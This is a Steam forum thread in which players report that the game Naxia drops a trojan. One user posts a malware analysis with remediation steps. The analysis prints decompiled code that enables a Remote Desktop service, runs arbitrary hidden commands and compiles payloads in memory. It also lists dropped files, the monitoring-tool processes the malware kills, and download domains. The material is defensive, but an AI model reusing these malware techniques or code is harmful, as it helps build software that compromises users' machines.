Virus detected :: Naxia General Discussions

Store Page

Naxia

All Discussions Screenshots Artwork Broadcasts Videos News Guides Reviews

Naxia > General Discussions > Topic Details

This topic has been locked

blackheart2 Aug 9, 2020 @ 12:06am

Virus detected

TL;DR: Naxia appears to have installed a trojan on startup.

FYI, here is an email I sent to Naxia's support:

I purchased your game Naxia from Steam today. When I started it up, Windows Defender immediately* identified a file name 'version.dll' in my $USER\AppData\Local\Temp folder and quarantined it. Windows Defender says this file is a trojan designated

Trojan:Win32/Occamy.C1B

I uploaded it to VirusTotal and VirusTotal confirms that 47 engines detect this as a threat. Here are the details:

https://www.virustotal.com/gui/file/1b3f266aa8c67a00723f9cfbd10349b05a71525e1c0402454320dca01b472311/details

While I do not know how to confirm that Naxia created this file**, its timestamp does agree with two of the folders in the Naxia folder in SteamApps. In the meantime, I have deleted the file and uninstalled your game.

Are you aware of this issue? Can you confirm that your application creates a file with this name in this directory? I note that this file is a Mono/.NET Assembly and your game uses Unity and [therefore] probably also C#. If this file is one created by your game, do you agree that it is a security threat?

---

* More precisely, a second after the cutscene started.
** I guess I could try to reproduce this in a VM, but I don't have one handy and I am not sure I want to investigate this further.

A developer of this app has marked a post as the answer to the topic above.
Click here to jump to that post.

Originally posted by Infinite8:

with the help of this user "atom0s" we figure out what happened, we used a third-party package called mesh effect you can find it in the unity asset store https://assetstore.unity.com/packages/vfx/particles/spells/mesh-effects-67803#content, it has a DLL file under demo resources called ICSharpcode.Nrefactory.dll that cause the problem. we remove it from the game and create a ticket for unity about the issue and tell them what is going on with the package, sorry for the problem but now it is fixed. many thanks to atom0s to help us figure it out. this topic will close next week. you can now update the game and enjoy it.

< >

Showing 16-30 of 39 comments

Aral Aug 15, 2020 @ 11:20pm

Originally posted by Drannor:
Lol funny I just started wondering about this a few days ago,

after I seen a game I thought looked cool being given out for 'free'.

I almost downloaded it but then remembered hearing about virus's being on games on steam,

is this some kind of new 'thing' happening nowadays?

Where game devs are starting to see there's more potential in sticking viruses on people's computers to hack their financial accounts than actually making good games to sell?

(I say this after 3 weeks ago I had 2 credit cards defrauded from using this computer I game with).

Hmm.

there is not any virus in the game, we are communicating with unity about the issue, and steam checks all the content before it got released. but as we said before we are working on it.

#16

Aral Aug 16, 2020 @ 10:37am

Originally posted by blackheart2:
Thank you. I contacted Unity support, and I will reply if I hear back from them.

Originally posted by katta83:
I've got the same problem with version.dll (but also with version.dll/data0001.res and ersion.dll/data0000.res), antivirus detected a HEUR:Trojan.Win32.Generic and deleted it. 2 days after that antivirus popped up for a new threat (UDS:DangerousObject.Multi.Generic) on naxia.exe

Originally posted by ves328:
me as well

can you please send name and version of your antivirus?

#17

katta83 Aug 17, 2020 @ 5:50am

Originally posted by katta83:
I've got the same problem with version.dll (but also with version.dll/data0001.res and ersion.dll/data0000.res), antivirus detected a HEUR:Trojan.Win32.Generic and deleted it. 2 days after that antivirus popped up for a new threat (UDS:DangerousObject.Multi.Generic) on naxia.exe

Hello Aral,
i'm using Kaspersky Anti-Virus 20.0.14.1085.
Regards

#18

Numb-Tung Aug 17, 2020 @ 10:50am

Hmm,, I found this game a few minutes ago after searching for arpg upcoming 2020 now I'm hesitant

Last edited by Numb-Tung; Aug 17, 2020 @ 10:50am

#19

ZeroOps

Aug 17, 2020 @ 6:50pm

To the developers - thank you for looking into this. I am confident that there is no virus and that Steam would immediately remove the game if this were the case. Please keep us all updated on what you find. Also, if you need more info from me (screenshots, etc), please let me know and I will help however I can.

#20

Aral Aug 17, 2020 @ 10:11pm

Originally posted by katta83:
Originally posted by katta83:
I've got the same problem with version.dll (but also with version.dll/data0001.res and ersion.dll/data0000.res), antivirus detected a HEUR:Trojan.Win32.Generic and deleted it. 2 days after that antivirus popped up for a new threat (UDS:DangerousObject.Multi.Generic) on naxia.exe

Hello Aral,
i'm using Kaspersky Anti-Virus 20.0.14.1085.
Regards

Originally posted by ZeroOpsFG:
To the developers - thank you for looking into this. I am confident that there is no virus and that Steam would immediately remove the game if this were the case. Please keep us all updated on what you find. Also, if you need more info from me (screenshots, etc), please let me know and I will help however I can.

we are trying to help you. definitely with your help, we can solve the problem soon. we shared our problem with unity and will share with Kaspersky.
many thanks to you💐

Last edited by Aral; Aug 17, 2020 @ 10:12pm

#21

atom0s

Aug 18, 2020 @ 6:30pm

Warning - This Game Is Infected

While the developers are claiming otherwise in the recent topics, this game is infected with a virus. I would avoid this game at all costs currently until this is sorted!

What the game is doing:

Upon launch, the game will extract a DLL that it is manually loading from memory called 'version.dll'. This is fake renamed threading module which is extracted to:
C:\Users\<yourname>\AppData\Local\Temp\version.dll

This file is not just a standard Version information based library, it attempts to connect to the internet AND it restores the Remote Desktop Service permissions on your system to attempt to allow unwanted access to your system:

std::basic_string<char,std::char_traits<char>,std::allocator<char>>::assign( &Dst, "cmd.exe /c \"sc config SessionEnv start= auto&sc start SessionEnv\"", 0x41ui64);

SessionEnv is the Remote Desktop service on Windows.This is attempting to restore the startup type for that and force-start it.

It then tries to self-install itself as a .NET framework sub-module via the .NET registry under the name 'tlpless.dll'. This gets the install paths to your .NET framework via the keys here:

SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v2.0.50727

This DLL also takes ANY command line passed to it and starts it in a silent console window attempting to exploit administrative permissions on your system, if the argument /start is present:

std::basic_string<char,std::char_traits<char>,std::allocator<char>>::assign( &lpCommandLine, "cmd.exe /c start /b ", 0x14ui64); sub_180002990(&lpCommandLine, &Filename); sub_180002990(&lpCommandLine, " /error"); v7 = (CHAR *)&lpCommandLine; if ( v45 >= 0x10 ) v7 = lpCommandLine; CreateProcessA( 0i64, v7, 0i64, 0i64, 0, 0, 0i64, 0i64, &StartupInfo, (LPPROCESS_INFORMATION)&StartupInfo.hStdOutput); if ( v45 < 0x10 ) goto LABEL_64; v8 = lpCommandLine;

When the tlpless.dll is loaded, it will attempt to check for a valid internet connection via connecting to microsoft.com and google.com. Afterward if valid, it will call a method inside of the tlpless.dll called 'Add':

signed __int64 __fastcall StartAddress(LPVOID lpThreadParameter) { HANDLE v1; // rax HMODULE v2; // rax void (*v4)(void); // rax while ( !InternetCheckConnectionA("http://microsoft.com", 1u, 0) && !InternetCheckConnectionA("http://google.com", 1u, 0) ) Sleep(0x7530u); Sleep(0x7D0u); v1 = OpenThread(0x1FFFFFu, 0, dwThreadId); SuspendThread(v1); v2 = LoadLibraryA("tlpless.dll"); if ( !v2 ) return 1i64; v4 = (void (*)(void))GetProcAddress(v2, "Add"); if ( !v4 ) return 1i64; v4(); Sleep(0xD4A50FFF); Sleep(0xD4A50FFF); Sleep(0xD4A50FFF); return 0i64; }

This will also drop other fake files into your temp folder that mask themselves as .NET related error reporting tools. THESE ARE FAKE. These contain the infected DLLs in their resources.

https://i.imgur.com/AOQCprN.png
Scan: https://www.virustotal.com/gui/file/1b3f266aa8c67a00723f9cfbd10349b05a71525e1c0402454320dca01b472311/detection

https://i.imgur.com/YLcIk7B.png
Scan: https://www.virustotal.com/gui/file/63ec3ef6eb4e0270e3475b3d4d8c1421275b59f533afc5988b3c25fbd3e0e554/detection

https://i.imgur.com/0gRU1zG.png
Scan: https://www.virustotal.com/gui/file/1b3f266aa8c67a00723f9cfbd10349b05a71525e1c0402454320dca01b472311/detection

The embedded DLLs are C# loaders that are used to invoke/load other modules. This is half-packed/protected:
https://i.imgur.com/TFvEEMH.png

This method decrypts a hardcoded infected script to exploit the system further.

DO NOT BUY THIS GAME.
DO NOT TRUST THIS GAME.

It is absolutely infected. I am reporting this to Steam as well.

#22

atom0s

Aug 18, 2020 @ 6:55pm

Infected files created/dropped:
- C:/Windows/Microsoft.NET/Framework/ntsync.exe
- C:/Windows/Microsoft.NET/Framework/version.dll

Modules to look for on your system:
- libntsc*.dll
- GNU\\scntlib*.dll

While running, this will attempt to kill any process with the following partial name matches:
- askmgr
- rocessha
- rocexp
- ystemexplore
- anvir

It will try to download data/info from:
- "<removed>/jipperskrippersservice.ru/other/new.html"
- "<removed>/margancherforfun.com/other/new.html"
- "<removed>/cellavillibycurtiz.ru/other/new.html"

It will look for the following information:
- MoreStarsMoreSpace
- MoreStarsMoreSpace!

Then attempt to split and decrypt more files to install on your system to continue infection.

These new files are loaded with a base assumed class via:

private static string EB(string[] ns, string code) { CSharpCodeProvider csharpCodeProvider = new CSharpCodeProvider(); CompilerParameters compilerParameters = new CompilerParameters { GenerateExecutable = false, GenerateInMemory = true }; compilerParameters.ReferencedAssemblies.Add("System.dll"); compilerParameters.ReferencedAssemblies.Add("mscorlib.dll"); for (int i = 0; i < ns.Length; i++) { compilerParameters.ReferencedAssemblies.Add(ns);
}
CompilerResults compilerResults = csharpCodeProvider.CompileAssemblyFromSource(compilerParameters, new string[]
{
code
});
if (compilerResults.Errors.Count == 0)
{
object obj = compilerResults.CompiledAssembly.CreateInstance("MyNewClass");
if (obj != null)
{
return Convert.ToString(obj.GetType().GetMethod("MyMethod").Invoke(obj, null));
}
}
return "dothis";
}[/code]

#23

atom0s

Aug 18, 2020 @ 7:10pm

If you ran this game, and are potentially infected, then do the following. (DO NOT RESTART YOUR PC BEFORE DOING THIS STUFF!)

1. Uninstall the game until this is dealt with, this game is not safe to run.

2. Clear your temp folder entirely.

3. Delete the infected droppers:
- C:/Users/<yourname/AppData/Local/Temp/version.dll
- C:/Windows/Microsoft.NET/Framework/ntsync.exe
- C:/Windows/Microsoft.NET/Framework/version.dll

4. Ensure Remote Desktop is disabled on your system:
- See here for more info: https://www.howto-connect.com/enable-disable-remote-desktop-configuration-service-windows-10/

5. Look for any additional instances of 'ntsync.exe' and 'version.dll' you are not familiar with or were created recently when you first/recently launched Naxia. Remove those as well. (Do so with caution, as version.dll can be a legit module for certain applications!)

6. Block all access to the following websites in your hosts file / firewalls:
- jipperskrippersservice [dot] ru
- margancherforfun [dot] com
- cellavillibycurtiz [dot] ru

#24

Infinite8 [developer] Aug 18, 2020 @ 9:22pm

Originally posted by atom0s:
If you ran this game, and are potentially infected, then do the following. (DO NOT RESTART YOUR PC BEFORE DOING THIS STUFF!)

1. Uninstall the game until this is dealt with, this game is not safe to run.

2. Clear your temp folder entirely.

3. Delete the infected droppers:
- C:/Users/<yourname/AppData/Local/Temp/version.dll
- C:/Windows/Microsoft.NET/Framework/ntsync.exe
- C:/Windows/Microsoft.NET/Framework/version.dll

4. Ensure Remote Desktop is disabled on your system:
- See here for more info: https://www.howto-connect.com/enable-disable-remote-desktop-configuration-service-windows-10/

5. Look for any additional instances of 'ntsync.exe' and 'version.dll' you are not familiar with or were created recently when you first/recently launched Naxia. Remove those as well. (Do so with caution, as version.dll can be a legit module for certain applications!)

6. Block all access to the following websites in your hosts file / firewalls:
- jipperskrippersservice [dot] ru
- margancherforfun [dot] com
- cellavillibycurtiz [dot] ru

Hi, thanks for the report, we shared our problem with unity and Kaspersky. we are investigating the problem. because of the current state of the world COVID-19, their response times to reports will be slower as they said.
so please wait, we are working on this issue.
meanwhile, we are trying to build the game on Linux to see what happens. we will share the result with you.

Last edited by Infinite8; Aug 18, 2020 @ 9:28pm

#25

Celendrin Aug 18, 2020 @ 9:27pm

Hey Atom0s,

I'm looking at a game called " Streets Ablaze ",

they're an indie company who put out their game for free recently (they used to charge for it) and I'm a bit paranoid about if it has any kind of virus attached to it,

how exactly does a person do a virus check on something from steam?

I heard someone say they put a game through Virus Total but how are you supposed to do that with steam games?

I'd like to play the game I had it on my wishlist before they made it free, but would just like to make sure there's nothing weird attached to it,

cool thanks for any help

#26

atom0s

Aug 18, 2020 @ 11:46pm

Originally posted by Drannor:
Hey Atom0s,

I'm looking at a game called " Streets Ablaze ",

they're an indie company who put out their game for free recently (they used to charge for it) and I'm a bit paranoid about if it has any kind of virus attached to it,

how exactly does a person do a virus check on something from steam?

I heard someone say they put a game through Virus Total but how are you supposed to do that with steam games?

I'd like to play the game I had it on my wishlist before they made it free, but would just like to make sure there's nothing weird attached to it,

cool thanks for any help

In most cases this will never be an issue and things are generally caught pretty fast. However, not all viruses are the same and can be hidden from detection by various means. The infection this game has does just that, to hide itself. Steam does not validate developer files outside of basic scans of the raw files, which does not catch everything.

Which means you are left to deal with whatever the devs push publicly. They are normal files from someone elses machine, so if a dev really wanted, they could easily use Steam as a platform to infect others. (I do not think Naxia is infected intentionally.)

The best means if you are unsure to follow would be to install the game in an isolated environment. Either another computer with limited/no network access or in an isolated VM that is locked down. You can analyze what things are happening, what new files are created, what a process does/accesses on the system etc.

In this case, Naxia is creating the infected version.dll file shortly after launching and playing the initial cutscenes.

#27

Celendrin Aug 19, 2020 @ 12:22am

well anyways all I can say is if steam games are carrying this kind of stuff imagine what's gonna happen when people start using brain-chips..

( sigh what a world we live in lol..)

#28